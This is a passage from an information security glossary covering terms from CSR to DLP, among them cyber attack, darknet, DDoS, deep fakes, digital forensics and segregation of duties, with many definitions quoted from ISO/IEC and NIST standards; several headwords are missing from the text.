An emerging form of organisational self-regulation intended for organisations to be seen to achieve wider social and ethical objectives, in addition to conventional (capitalist, competitive, profit-driven) business objectives.  In the information security context, CSR typically concerns privacy and integrity, for example not intrusively capturing and exploiting personal information about workers and third parties, and overtly supporting the Internet rather than merely using it.


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victimsdata, coercing them into paying a ransom for the decryption keys.

CTF (Capture The Flag)

Simulation of an attack, or a planned campaign consisting of multiple attacks, on an organisation or its sites, networks, IT systems or parts thereof, in which the side on the offensive (commonly called the red team) attempt to place markers (such as fake bombs) and/or retrieve pre-designated information (the flags) to prove that they largely or completely defeated the defenders (the blue team).  See also purple team.

(Controlled Unclassified Information)

US government term for unclassified information that nevertheless requires some degree of protection, typically for legal compliance reasons (e.gprivacy).  Structured into categories such as critical infrastructure; defense; export control; financial etc.  Intended to replace myriad similar terms (such as SBU and FOUO) now officially deprecated.


Temporary/surrogate owner who takes possession of, and is reasonably expected to care for and protect, an information asset, acting on behalf and in the best interests of its true owner.  “Person or entity that has custody, ownership, control or possession of Electronically Stored Information” (ISO/IEC 27050-1).

(Common Vulnerabilities and Exposures)

MITRE’s original reference database of known software security vulnerabilities.  See and CWE.

CVV (Card Verification Value), CVV2 (2nd generation CVV),
CSC (Card Security Code),
CAV (Card Authentication Value), CAV2 (2nd generation CAV), CVC (Card Validation Code), CVC2 (2nd generation CVC), CID (Card Identification Number)

A value encoded on the magnetic stripe or a 3 or 4-digit decimal number normally printed rather than embossed on a credit/debit/bank card, that can be used to verify the card number.  According to PCI-DSS, the value must not be stored by a merchant: after it has been used to validate the card number, it should be erased from memory so that if the merchant’s systems are ever compromised by crackers, they will not gain the fullz … provided they haven’t installed their own data monitoring/logging software to capture the data in transit or during processing.

(Common Weakness Enumeration)

MITRE’s community-developed dictionary of commonplace types or classes of software security vulnerabilities.  Grew out of the CVE.  See


Originally coined as a mathematical term, it evolved to mean governance and control, and latterly computing and related ICT, particularly the Internet.  A jargon prefix/buzz-word, much abused by marketers, journalists, politicians etc. and widely misinterpreted.  Inconsistently hyphenated-too.  Prefixed “cyber”, almost any term appears hi-tech and novel whereas in fact most are old hat.

Cyber-Armageddon, cybergeddon

A full-blown unrestrained cyberwar between highly capable and well-resourced nations or groups would undoubtedly inflict devastating economic damage with horrendous social consequences on a global scale, analogous to the nuclear weapons posturing and threats of MAD (Mutually-Assured Destruction) during the Cold War.

cyber attack,

An attack staged primarily through electronic means, particularly through the Internet“An attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information” (CNSSI-4009).  “Malicious attempts to exploit vulnerabilities in information systems or physical systems in cyberspace and to damage, disrupt or gain unauthorized access to these systems” (ISO/IEC 27100 [draft]).


Someone who uses social media, email etc. to harass, intimidate, threaten, coerce and/or traumatize victims.

Cyber command

Military command center for cyber operations, such as the US Cyber Command reportedly based at Fort Meade, Maryland.


The commission of criminal acts in cyberspace.  More informally, the use or exploitation of ICT and/or the Internet to commit crime.


Someone who uses IT systems and networks (particularly the Internet) to commit crime.


Use of IT systems and networks (particularly the Internet) to spy on targets.


Criminal exploitation of illegitimate access to and control over sensitive and/or valuable information in order to coerce victims out of money etcAttacks typically involve the use of hacking, malware (e.gransomware), theft of data storage media or ICT devices, and/or social engineering.  See also extortion.

Cyber harassment

Harassment or coercion conducted through the Internet, generally, such as revenge porn and spam bombing.

Cyber incident

Information security incident involving ICT.  “Actions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system and/or the information residing therein. See incident.” (CNSSI-4009).


The ICT elements of global, national or corporate infrastructures, especially automated systems interconnected through networks such as the Internet.

Cyberinsurance, cyber insurance, cyber risk insurance

Insurance against specified cyber-risks, a form of risk sharing.

Cyber persona

“Digital representation of an individual or organisation necessary to interact in cyberspace” (ISO/IEC 27101 draft).


Preparing to survive cyberwar or extreme cyber incidents including post-apocalyptic social disorder and infrastructural collapse.


(a) A science fiction genre characterized by classic futuristic ICT works such as William Gibson’s Neuromancer. (b) A proudly nonconformist anti-establishment youth with a deep fascination for the cyber world and hacking plus, often, piercings, tattoos and a curious obsession with black clothing.

Cyber resilience

Resilience, robustness and stability of the cyberinfrastructure“The ability of an organisation to continue to carry out its mission by anticipating and adapting to cyber threats and other relevant changes in the environment and by withstanding, containing and rapidly recovering from cyber incidents” (Financial Stability Board Cyber Lexicon, November 2018).

cyber risk,

Potentially damaging or harmful situation involving data, ICT, networking etc., particularly deliberate attacks by hackers, extortionists, criminals, social engineersfraudsters, terrorists or other competent adversaries.

cyber security

Primarily refers to technical/ICT security controls protecting computer systems, networks and the associated data, in other words IT security.  However, the definition is sometimes widened to include information security as a whole, while some narrow it to refer to defensive measures within cyberwarfare, Internet security, critical [national] infrastructure security, and/or securing virtual worlds.  Caveat lector“The ability to protect or defend the use of cyberspace from cyber attacks” (CNSSI-4009).  “The process of protecting information by preventing, detecting, and responding to attacks” (NIST Cybersecurity Framework).  “Includes any processes, practices or technologies that organisations have in place to secure their networks, computers, programs or the data they hold from damage, attack or unauthorised access." (UK Government Department for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2018: Technical Annex).

Cybersecurity framework

“Basic set of concepts used to organise and communicate cybersecurity activities” (ISO/IEC 27101 draft).


Vague term, not yet consistently defined, used and understood, typically referring vaguely to ICT, particularly the Internet, and sometimes Internet culture, virtual systems, virtual worlds, collaborative working, social media etc“A global domain within the information environment consisting of the interdependent network of information systems infrastructures including the Internet, telecommunications networks, computer systems, and embedded processors and controllers” (CNSSI-4009).


Illicit exploitation and misappropriation of commercial trademarks in the cyber/ICT context, for example, using copycat or lookalike domain names or URLs for phishing, fraud or other attacks.  See also typosquatting.

Cyber stalking

Grooming or snooping on victims through the Internet, generally, typically continuing to contact and coerce them after being asked or told to desist.


An attack in, on or through cyberspace.


Sabotage in cyberspace that compromises IT systems/devices, databases, networks, data or information e.g. destroys or damages them, interrupts or delays business activities, or leads to the loss of valuable business or the inappropriate disclosure of confidential information.  Whereas sabotage usually implies inflicting physical damage (such as arson), cybertage often affects intangible information assets (e.g. using malware such as ransomware).


The commission of terrorist acts in cyberspace.  More informally, the use or exploitation of ICT to commit terrorism.


Person who commits cybertage, such as a mole.


Threat or threat agent active in the cybersecurity domain - particularly substantial, highly capable ones backed by governments and other resourceful and determined adversaries.


Computer-enabled wanton damage, or wanton damage of computers.


Person who uses hacking, malware, social engineering etc. to further a malicious personal agenda or obsession.

cyber war,
information warfare

The deliberate exploitation of vulnerabilities in an adversary’s computing and telecommunications capabilities, networks etc. by a nation state as an act of war intended to disrupt vital parts or the entirety of their critical [national] infrastructure, disable their national defences and offensive capabilities, inflict crippling economic damage etc.  Due to exclusions in the small print for ‘acts of war’, incidents classed as cyberwar attacks may not be covered by cyberinsurance.  See also cyber-Armageddon.


Tool or technique (such as a computer, malware, hacking, social engineering, cybertage, spying, coercion or EMP weapon) capable of being used offensively to attack an adversary’s critical infrastructure as part of cyberwar or a similar military mission, and/or to defend against such attacks.

(Cyber Observable eXpression)

A schema for specifying, capturing, characterizing and communicating/sharing IT system and network events and properties for event management and logging, malware characterisation, intrusion detection/prevention, incident response and digital forensics.  See also STIX and TAXII.

Cylinder lock

The most common form of physical lock, used on many front doors.  When someone inserts the correct key into the keyway, internal pins are lifted to exactly the right positions to allow the plug to be rotated in the hull, thereby retracting the latch so the door can be opened.

Cynefin framework

A framework or conceptual model concerning situations or systems that are described as simple (stable and predictable), complicated (largely predictable through cause-and-effect relationships), complex (largely unpredictable, linkages rationalized only after the fact), chaotic (inherently unstable and unpredictable) or disordered (of unknown status).  Different modes of thinking, controlling or directing, planning and responding are appropriate in each case.


An archaic British spelling of cipher that, paradoxically, is used in some modern compound words concerning cryptography.  See algorithm.


Unintelligible string such as HbAaKhBsaao)X]*AX551&*S66 that makes no sense to a human reader but which can be transformed back into the corresponding plaintext using the correct cryptographic algorithm/s and encryption key/s.

Darknet, Darkweb,
dark Web, invisible Web, hidden Web

Covert and illicit part of the deep Web offering criminal/black market services and tools such as hacking, RaaS, money laundering and illegal drugs.  Aside from blocking or evading search engine spiders, Darkweb sites and apps may exploit novel protocols making them inaccessible to users who lack the requisite access authority, knowledge, keys and/or tools.

Dash[board] cam[era], dashcam

CCTV camera mounted in or on a vehicle (not necessarily literally on the dashboard) to record traffic incidents, bad driving, road rage, accidents etc.  A form of surveillance.  See also body cam.

(Dynamic Application
Security Testing)

In effect, penetration testing of an application, checking (from the network perspective) whether its exposed ports and services have known vulnerabilities.  See also SAST and IAST.


Electronic representations of information within a computer system or network.  In digital computers, data (and indeed software) consists of sequences of logical ones and zeroes known as bits.  Strictly speaking, data is the plural of “datum” but it is widely used in the singular.  “Collection of values assigned to base measures, derived measures and/or indicators.  Note: this definition applies only within the context of ISO/IEC 27004:2009” (ISO/IEC 15939:2007).

Data Analytics

Fancy marketing term for the common-or-garden study and analysis of data.  Typically involves the use of statistics to examine and glean useful information from large data sets, also known as big data.

Data at rest

Digital bits-n-bytes taking a well-earned break from the daily grind?  Alternatively, “Data stored on stable non-volatile storage” (ISO/IEC 27040).  “Information residing on media or a system that is not powered or is unauthenticated to” (NZ information Security Manual).

  Cf. data in motion.


Structured and managed collection of data.  The structure and accumulation of data, along with the software functions to manage, manipulate and report them, usually make databases far more valuable than plain, unmanaged ‘flat files’ or simple lists and tables.  The most important computer systems often are databases, making database security controls such as those protecting data integrity a vital part of information security.

DataBase Administrator

Privileged user who administers (manages) databases.  Normally responsible for running the DBMS, configuring, maintaining and tuning databases e.g. setting up user rôles and defining their access rights to tables and cells, monitoring security logs etc.

Data breach

A breach involving data“Compromise of security that leads to the accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to protected data transmitted, stored or otherwise processed” (ISO/IEC 27040).

Data concerning health

“Personal data related to the physical or mental health of a natural person, including the provision of health care services, which reveal information about his or her health status” (GDPR).  See also PHI.

Data controller

The organisation or person gathering, holding and using personal information, responsible for ensuring it is adequately secured in order to protect the data subjects’ privacyAccountable for securing the information, even if it is processed by a separate organisation (a data processor).

Data dictionary

Formal description of the data fields of records in a database, ideally including their information security characteristics.

Data in motion

Digital bits-n-bytes on the move, jiggling about, steadfastly refusing to stay still and be counted?  Alternatively, “Data being transferred from one location to another.  Note: These transfers typically involve interfaces that are accessible and do not include internal transfers (i.e., never exposed to outside of an interface, chip, or device)” (ISO/IEC 27040).  Cfdata at rest.

Data in transit

“Information that is being conveyed across a communication medium” (NZ information Security Manual).

  See also data in motion.

Data in use

Data currently being processed“Information that has been decrypted for processing by a system” (NZ information Security Manual).

Data miner

Form of malware that covertly collects information on web users, for example secretly recording personal information submitted by users of online forms.

Data objects

“Elements which contain PII.  Example: such elements are for instance files, documents, records or attributes. Concrete data objects may be e.g. invoices, contracts, personal files, visitor lists, personnel planning sheets, user accounts, log entries, consent documents, and so on.  Note: Data objects can be combined with other data objects in a cluster of PII. The individual data object can be of varying complexity.” (ISO/IEC 27555 draft).

Data spill

“An information security incident that occurs when information is transferred between two security domains by an unauthorised means.  This can include from a classified network to a less classified network or between two areas with different need-to-know requirements” (NZ information Security Manual).

Data Processing (DP)

Prehistoric term for what is now commonly known as the ICT function/department/team or simply “IT”.

Data processor

An organisation that processes personal information on behalf of another (the data controller).  Typically, an ICT or cloud computing services company.

Data protection

See information protection.

Data Protection Directive

“Directive 95/46/EC of the European Parliament and of the Council on the protection of individuals with regard to the processing of personal data and on the free movement of such data” which sought to harmonize information protection or privacy laws across the European Union and further afield (e.g. Australia, Canada and New Zealand).  Being replaced by GDPR.

Data remanence

“Residual information remaining on a device or storage media after clearing or sanitising the device or media. Sometimes described as data persistence” (NZ information Security Manual).

  See also remanence.

Data security

See IT security.


Application supporting both offense using, and defences against, social engineering attacks.  Mines open source intelligence sources and correlates information on individuals, domains, email addresses, phone numbers etc.  An example of dual-use technology, popular with black-, grey- and white-hats.  See also Burp suite and Maltego.

Data stealing/thieving/theft malware

Malware that surreptitiously harvests and exfiltrates valuable proprietary information or personal information from infected systems and networks to be exploited directly or sold on the black market.

Data subject

The person whose personal information it is.

(DataBase Management System)

Specialized software system supporting database applications.  Provides management functions to organise data (usually in the form of tables, matrices, lists or sets) and data security (e.g. enforcing referential integrity).  Provides a standardized interface or abstraction layer between the application and the underlying operating system and hardware.  Heavily optimized for performance and throughput, for example caching frequently-accessed data to reduce disk reads.  Cf. management system (in the ISO sense).

(Distributed [or
Digital] Control System)

Originally a term for a process control computer system that uses digital computer technology rather than analogue electro-mechanical controls.  Latterly used to denote SCADA-like ICS distributed around the plant and operating semi-autonomously.

(Data Collection Unit),

Network node or thing that gathers data from other things such as distributed sensors, smart meters etc. and forwards it to a central system, passing commands in the opposite direction.  Used in ICS/SCADA, IIoT and IoT.

(Distributed Denial of Service)

Type of DoS attack using numerous attacking systems (typically bots) to generate large volumes of network traffic, thereby flooding and possibly swamping (overloading) the target systems or network, causing them to stop providing ICT services.  See also DRDoS.

(Data Encryption Algorithm)

Symmetric encryption algorithm specified in FIPS PUB 46 in 1977 for the Data Encryption Standard DES.

Dead drop

See drop.

Dead Letter Box (DLB)

See drop.

Dead double

Identity thief who assumes the identity of a dead person.


Lying, lie, fabrication or deliberate, manipulative concealment of the truth.

Deception technology

[Marketing] term for advanced honeypot systems designed to lure, divert, contain and gather information (intelligence) on hackers inside corporate networks, all the while deceiving them into believing they are genuinely gathering reconnaissance, exploiting vulnerabilities and capturing flags.  A potentially valuable approach in some circumstances, but potentially costly and risky too (e.g. distracting, diverting and misleading cybersecurity resources while engendering a false sense of security).

Decision criteria

“Thresholds, targets, or patterns used to determine the need for action or further investigation, or to describe the level of confidence in a given result” (ISO/IEC 15939:2007).


The authorized removal or downgrading of classification level on information for which the current class is no longer appropriate (e.g. outdated, irrelevant or already disclosed), thereby increasing permitted access.  “A process whereby information is reduced to an unclassified state and an administrative decision is made to formally authorise its release into the public domain” (NZ information Security Manual).

  See also redaction.


Convert coded messages into their plaintext equivalents, if necessary using the correct section, page and entries in a code book

decipher, decipher

Reversal of the encryption process requiring the correct key to recover the original plaintext from the cyphertext (where possible).


Some early ransomware had cryptographic design flaws or coding bugs, allowing encrypted files to be decrypted using utilities released by antivirus companies without victims having to pay the ransom.  Most current ransomware is better designed and coded, making encrypted files useless without the necessary decryption key.


Reduction or elimination of redundant information“Method of reducing storage needs by eliminating redundant data, which is replaced with a pointer to the unique data copy.  Note: Deduplication is sometimes considered a form of compression” (ISO/IEC 27040).

Deep cover

Infiltrating a target organisation so effectively that the infiltrator becomes highly trusted and may gain privileged access to its innermost secrets, albeit increasing the risk of the agent being turned or going native.  See also mole and sleeper.

Deep fake

Advanced audio-visual techniques can ‘put words into the mouths’ of celebrities, politicians, activists and adversaries, making them appear to express something they did not.  Just as written materials can be edited or fabricated, small changes to genuine audio-visual content (such as deleting the word “not” or changing a frown into a smile) are relatively easy to make seamlessly, yet can dramatically affect the meaning or interpretation of, say, a political speech or public statement.  As the techniques advance through artificial intelligence, neural networks and deep learning, wholescale changes are becoming easier to make and harder to spot, potentially leading to de novo fabrication of lengthy video clips in fake settings with fake audiences.  There are serious implications for society through large-scale social engineering such as fake news, fraud, espionage, information warfare and cyberwar, threatening forensics, authority, accountability and trust.

Deep packet inspection

Third generation firewalls can examine the payloads (data content) of network packets, as well as the IP addresses and protocol information in the packet headers, in order to apply more granular security rules.  Their ability to access the content of network traffic raises privacy and confidentiality concerns: these are trusted devices.

Deep Web, Deepweb,
Deep net, Deepnet

Internet sites and services that are not readily accessible and searchable using conventional search engines such as Google.  Includes the Darknet, plus web pages and servers protected behind corporate firewalls


Stating or implying something false that unduly harms the image and reputation of another person.  Note that a true i.e. factually accurate statement, by definition, is not defamatory though it may be distinctly uncomplimentary.  See also libel and slander.


Pre-set configuration.  Straight out of the box, newly-installed software and hardware typically has standardized and convenient but relatively weak security settings, for example passwords that are widely known in the hacker community, and pass-all settings.

Default deny,

Access control principle stating that information should only be released to authenticated individuals if they have a legitimate purpose or reason for using the information, and are authorized to do so.

Default permit,

Access control principle stating that information should normally be released or disclosed unless such access needs to be explicitly denied for some specific, legitimate reason.


An identified bug, flaw or other inherent issue with a system, process, person, organisation etc.


Control principle whereby multiple overlapping or complementary ‘layers’ of protection are applied, all of which would have to be breached, overcome, disabled or bypassed in order to impact or compromise the protected information assets.  This is a structured, systematic approach, more than simply increasing the number of controls.  “A layered combination of complementary countermeasures” (Official ISC2 Guide to the CISSP CBK, 2007, page 282).

Defensive security,
passive security,
reactive security

Security practices that deter, prevent, react or respond to attacks and other incidents, generally by minimizing vulnerabilities and/or impacts for instance using silent alarms, tell-tales or whistleblower’s hotlines coupled with highly efficient incident response practices to react quickly and decisively to the very earliest signs of trouble.  Cf. offensive security.


To commit or perpetrate fraud.


Secure erasure process that applies an extremely strong magnetic field to magnetic data storage media such as computer disks or tapes to destroy the stored data.  In addition to concerns over the equipment and operating procedures, the extremely high density of modern magnetic storage methods, high coercivity of the materials, and use of RAID and similar redundant storage/error correction techniques makes degaussing less reliable in practice than it may appear, although subsequent physical destruction of degaussed media increases assurance“Render data unreadable by applying a strong magnetic field to the media” (ISO/IEC 27040).


A device that degausses“An electrical device or permanent magnet assembly which generates a coercive magnetic force to destroy magnetic storage patterns in order to sanitise magnetic media.” (NZ information Security Manual).

Delegated authority,

Refers to someone passing some of their responsibility and power to a subordinate within specified parameters, for example giving them the ability to sign-off (authorize) expenses claims or procurement orders up to a certain dollar value.  Implies a level of trust in the subordinate, often supported by additional controls.  While the authorized person is personally accountable for any incidents arising from their actions and inactions, the more senior person generally shares some of the accountability since he/she made the decision to delegate.

disposition mechanism, erasure,
destruction of data storage media,
anonymisation of data

“Process by which PII is changed in an irreversible manner so that it is no longer present or recognizable and cannot be used or reconstructed after the process.  Notes: (1) As a rule, “secure deletion” is required. Secure deletion means that reconstruction of the data is either impossible or requires substantial effort (in human resources, means, time). For selecting the deletion methods, the need for protection of the data concerned is to be taken into account; (2) Equally, an alternative way to reach the goal of deletion is anonymisation. Further guidance on anonymisation (as a de-identification technique) can be found in ISO/IEC 20889:2018-11 (1st edition) — Privacy enhancing data de-identification terminology and classification of techniques; (3) the term ‘deletion’ covers all such synonyms: disposition mechanism, erasure, destruction, destruction of data storage media, anonymization of data.” (ISO/IEC 27555 draft).

Deletion class

“Combination of a standard deletion period and an abstract starting point for the period run.  Note: All clusters of PII which are subject to the same deletion period and the same abstract starting point are combined in a deletion class. As opposed to the (specific) deletion rule for a cluster of PII, the (abstract) deletion class relates only to the abstract starting point and not to a specific condition for the start of the period run (see also [clause] 8).” (ISO/IEC 27555 draft).

Deletion framework

“Policy documents and implementation mechanisms by means of which a PII controller ensures that its pools of personally identifiable information are deleted in accordance with the applicable legislation and/or regulation.” (ISO/IEC 27555 draft).

Deletion period

“Time period after which a specific cluster of PII should be deleted.  Note: As a generic term, the deletion period comprises all deletion periods. This includes the →standard deletion periods and the →regular deletion periods, which form special groups. However, the term also includes, for instance, the specific deletion periods for some clusters of PII or deletion periods in special cases. For details see Clause 7.” (ISO/IEC 27555 draft).

Deletion rule

“Combination of deletion period and specific condition for the starting point of the period run” (ISO/IEC 27555 draft).

Demand letter

See cease and desist letter.

De-militarized zone

See DMZ.

(Data Execution Prevention)

Operating system security feature intended to prevent pages in memory that happen to contain executable code from actually being executed unless they have been explicitly designated executable by resetting the NX (No eXecute) bit.  Helps prevent buffer overflow and similar attacks.


Measure of the extent to which a system, network, person, team, organisation etc. can be relied upon or trusted to perform as expected under all anticipated and ideally unanticipated circumstances.  Implies a level of assurance as to the suitability and effectiveness of its resilience, recoverability and contingency preparations, and clarity of the requirements.


Legal process requiring someone in court under oath to provide immediate verbal answers to verbal questions.  A form of discovery.  See also interrogatory.


Withdrawn and no longer recommended for use.  If significant flaws are discovered in cryptosystems, for instance, the corresponding standards, algorithms, protocols etc. are, at some point, removed from service and superseded – hopefully – by better ones.

Derived measure

Measure that is defined as a function of two or more values of base measures” (ISO/IEC 15939:2007).

(Data Encryption Standard)

Standard specifying a cryptographic algorithm (DEA - Data Encryption Algorithm) for US government use in 1977, published in FIPS PUB 46.  Still used by legacy systems, albeit normally in the somewhat more secure form of triple-DESVulnerable to brute-force attacks with a key length constrained by the standard to 56 bits rather than the maximum of 64, hence DES is deprecated


(a) Distinctive physical expression, shape or other characteristics of a product that is typically associated with a particular brand or trademark.  (b) Systematic process of analysing requirements, then creating and documenting something to satisfy those requirements.  (c) A structured and documented architecture.


Physically and/or logically obliterate information such that it is no longer recoverable in usable form, even using forensic techniques.  In some circumstances, the process may further involve erasing any trace of its prior existence (e.g. deleting associated metadata).  “Sanitize using physical techniques that make recovery infeasible using state of the art laboratory techniques and results in the subsequent inability to use the media for storage of data.  Note: Disintegrate, incinerate, melt, pulverize, and shred are destruct forms of sanitization” (ISO/IEC 27040).  Note: “destroy” is the correct English verb form, whereas “destruct” is an Americanism derived from “destruction”.  See also purge.


The act of destroying“Result of actions taken to ensure that media cannot be reused as originally intended and that information is virtually impossible or prohibitively expensive to recover” (ISO/IEC 27040).


“Develop and implement appropriate activities to identify the occurrence of a cybersecurity event.  The Detect Function enables timely discovery of cybersecurity events.” (NIST Cybersecurity Framework).  A core function within NIST’s cybersecurity framework along with identify, protect, respond and recover.

Detective control

Form of security control intended to detect an incident in progress, log the details and/or raise an alert or alarm to trigger the appropriate response.  See also preventive and corrective control.


Form of preventive control such as warnings and penalties intended to deter (that is, reduce the threat) of compromise or attack.

Development environment

Computer environment comprising systems, networks, devices, data and supporting processes that are used by software developers for developing new application systems.  Cf. production or test environments.


An item of computing or networking equipment, a piece of ICT hardware or electronic technology, or more generally a machine or method with a specific purpose.  Many devices also qualify as things or small systems.

Device access control software

Program restricting the use of communications ports and/or equipment (e.g. USB flash memory sticks) on a system.  “Software that can be installed on a system to restrict access to communications ports on workstations. Device access control software can either block all access to a communications port or allow access using a whitelisting approach based on device types, manufacturer’s identification, or even unique device identifiers” (NZ information Security Manual).

(Development – Operations integration)

Software engineering approach integrates application development, testing and ICT operations functions/teams and automates processes primarily to cut cycle times for software updates from months to hours.  A practical extension of Agile development, a form of RAD, and other continuous development methods.  See also DevSecOps.

(Development – Security Operations integration)

Extension of DevOps to integrate software development, testing, software/infrastructure security and ICT operations teams.  Extensive process automation speeds things up, improves repeatability and is well suited to cloud computing (e.g. automatically provisioning virtual systems, installing and configuring applications, and validating the installations including the security aspects).


One of several species of memory-scraping Point-of-Sale system malware discovered in the wild in 2012


One of several species of ransomware in the wild in 2019 that strongly encrypts victimsdata, coercing them into paying a ransom for the decryption keysTargets small organisations, demanding ransoms of about $1k.

(Department of Homeland Security)

Spooky US government agency responsible for intelligence and surveillance in support of defense, counter-terrorism, critical national infrastructure protection etc.  See also FBI and CIA.


Old-skool form of malware which silently calls a premium rate phone number on the victim’s modem, committing toll fraud.  See also war dialler.

Dictionary attack

Cryptanalytic attempt to guess or crack a password using words from the dictionary, in various combinations (e.g. forwards, backwards, with numbers prepended or appended, with punctuation).  A more sophisticated form of brute force attack.


An assurance and ethics scandal involving the deliberate programming of VW diesel cars to detect and respond to emissions testing in progress, cutting exhaust emissions to ace the test but increasing emissions under normal operating conditions.  A sign of things to come, perhaps, as everyday objects are smartened-up, becoming things capable of evading dumb checks and controls.

Differential backup

A backup of all the files created or changed since the last image backup.  In contrast to incremental backups, a system can be recovered simply by restoring the most recent image and differential backups.  However, differentials contain more data, hence they take longer to write and use more storage, than most incrementals.

Diffie-Hellman groups

“A method used for specifying the modulus size used in the hashed message authentication code algorithms. Each DH group represents a specific modulus size.  For example, group 2 represents a modulus size of 1024 bits” (NZ information Security Manual).


See hash.

Digital certificate

File containing information about a user or system along with their public key plus a digital signature from the Certification Authority to authenticate the certificate itself and to some extent (according to the nature and extent of the checks performed) the user or system to whom it was issued.

Digital device

“Electronic equipment used to process or store digital data” (ISO/IEC 27037).

Digital evidence

Forensic evidence in the form of data (e.g. the contents of a hard drive, tablet, smartphone or USB memory stick) gathered in connection with investigating, proving or disproving a crime.  “Information or data, stored or transmitted in binary form, that may be relied on as evidence” (ISO/IEC 27037).

Digital evidence copy

In order to guarantee the integrity of digital evidence, forensic analysis is performed on evidential copies that have been produced by appropriate methods and can be verified correct.  “Copy of the digital evidence that has been produced to maintain the reliability of the evidence by including both the digital evidence and verification means where the method of verifying it can be either embedded in or independent from the tools used in doing the verification” (ISO/IEC 27037).

Digital Evidence First Responder (DEFR)

“Individual who is authorized, trained and qualified to act first at an incident scene in performing digital evidence collection and acquisition with the responsibility for handling that evidence. Note: Authority, training and qualification are the expected requirements necessary to produce reliable digital evidence, but individual circumstances may result in an individual not adhering to all three requirements.  In this case, the local law, organisational policy and individual circumstances should be considered” (ISO/IEC 27037).

Digital Evidence Specialist

“Individual who can carry out the tasks of a DEFR and has specialized knowledge, skills and abilities to handle a wide range of technical issues.  Note: A DES may have additional niche skills, for example, network acquisition, RAM acquisition, Linux or Mainframe knowledge.” (ISO/IEC 27037).

Digital forensics,
cyber forensics,
computer forensics

The forensic analysis of digital evidence.  Strictly speaking, evidence may be obtained from various devices and things besides computers, while computing is usually - but not necessarily - digital.

Digital investigation

“Use of scientifically derived and proven methods towards the identification, collection, transportation, storage, analysis, interpretation, presentation, distribution, return, and/or destruction of digital evidence derived from digital sources, while obtaining proper authorizations for all activities, properly documenting all activities, interacting with the physical investigation, preserving digital evidence, and maintaining the chain of custody, for the purpose of facilitating or furthering the reconstruction of events found to be incidents requiring a digital investigation, whether of criminal nature or not” (ISO/IEC 27043).  Wow!  See also digital forensics.

Digital signature

Cryptographic hash of a message or file, constructed with the sender’s private key, used to ‘seal’ the message/file thus enabling any subsequent changes to be identified and so authenticate both the message and the sender (giving non-repudiation).

Digital storage medium

“Device on which digital data may be recorded” (ISO/IEC 27037, adapted from ISO/IEC 10027).

[Data] Diode

“A device that allows data to flow in only one direction” (NZ information Security Manual).


Momentary/transient reduction in supply voltage, lasting a few micro- or milliseconds.  Most dips pass without incident, but electronic systems with insufficient voltage regulation may fail.  See also brownout, spike, surge and blackout.

Direct evidence

Forensic evidence that derives from or is closely related to an incidentCf. circumstantial evidence.


A terrible incident such as a major fire, flood, fraud or hack.  Distinguished from ordinary events, incidents or crises by its severity, scale and impact.

[IT] Disaster Recovery

Fallback arrangements to restore IT systems, data and services supporting critical business functions from backups, often at an alternative location using cloud-based or mobile IT facilities, following a major incident affecting the primary ICT production facilities.

Disaster Recovery Plan (DRP)

Documentation of an organisation’s DR arrangements.


Attempt to share risk by explicitly and expressly denying responsibility for something.  Often used in an attempt to limit legal liabilities.  See also notification.


Revelation of confidential information.  May be deliberate or accidental, forced (e.g. by coercion, blackmail or social engineering) or voluntary, whether authorized and permitted or unauthorized and forbidden.  See also discovery.


Forensics term for the enforced disclosure of evidence to the counterparty in an official investigation or court case.  A strong reason to limit the collection and storage of information whose very existence might prove embarrassing or damaging to the organisation or individuals concerned (e.grisk assessment results or audit recommendations that were not taken seriously).  “Process by which each party obtains information held by another party or non-party concerning a matter.  Note: Discovery is applicable more broadly than to parties in adversarial disputes. Discovery is also the disclosure of hardcopy documents, Electronically Stored Information and tangible objects by an adverse party.  In some jurisdictions the term disclosure is used interchangeably with discovery.” (ISO/IEC 27050-1).  See also disclosure, deposition, interrogatory and subpoena.


Optional i.e. provided, used or configured according to someone’s discretion, choice or freewill.  Usually refers to IT security controls that are not mandatory.

Discretionary Access Control

Decisions on whether and how to control access to data can be made by the users of a DAC system using their discretion, as opposed to being coded irrevocably into a MAC system as an inherent part of its technical architecture.

Discussion forum, forum,
discussion group, group,
email reflector

Social networking discussion facility.  Messages sent to the group by a member through email or the website are automatically ‘reflected’ back to all members by email and (usually) archived on the website allowing them to be searched.  Messages containing sensitive or inappropriate content (e.g. intended for a specific group member or someone else entirely) or spam may be circulated in exactly the same way, while shared information may be exploited by social engineers.


Someone ‘ethically challenged’ who lies, deceives, cheats or defrauds others for their own benefit.  They cannot be relied upon, making them untrustworthy and probably unworthy of or unsuitable for various privileges and responsibilities.


Eliminate a malware infection from a system, normally by deleting the malicious software from wherever it is stored and (hopefully!) improving the security controls to prevent re-infection.  “To remove malware from within a file” (NIST SP800-114 rev1).


See misinformation.


Fall to pieces or rip asunder.  “Destruct by separating media into its component parts” (ISO/IEC 27040).

Disk image

(a) Copy of the data on a disk, typically created by an image backup.  (b) In computer forensics, a bit-copy of the entire contents of a disk or other storage medium using approved hardware, software and processes.  (c) In virtualisation, a virtual disk made available to a guest operating system by the hypervisor.

Disk mirroring,
(Redundant Array of
Inexpensive Devices)

Technique in which data are simultaneously written to and read from multiple disks, usually for resilience and/or performance reasons.  Various technical configurations are possible with different advantages, disadvantages, capabilities and information risks.


Eventual outcome or result of something.  “Range of processes associated with implementing records retention, destruction or transfer decisions which are documented in disposition authorities or other instruments” (ISO 30300:2011). 


Use of, or at least ready access to, alternative, independent services, sources, vendors, pieces of equipment, power sources, communications routes etc. in order to reduce the risk of failure of any one.  A resilience control.  Unanticipated dependencies between apparently diverse resources can create single points of failure and hence additional risks.  See also redundancy and mirror site.

Division of responsibilities, separation of duties,
segregation of duties

Control requiring the involvement of more than one individual or organisation to complete a business process e.g. a member of staff enters data but someone else, normally a supervisor or manager, must review and authorize it for processing.  Normally reinforced by controlled access to the corresponding system functions.  Reduces the possibility of fraud, barring collusion between the individuals or coercion, and data entry errors“Practice of dividing steps in a function among different individuals so as to keep a single individual from being able to subvert the process.” (PCI Card Production and Provisioning Physical Security Requirements, v2.0 January 2017).

(Data Leakage [or Loss] Prevention)

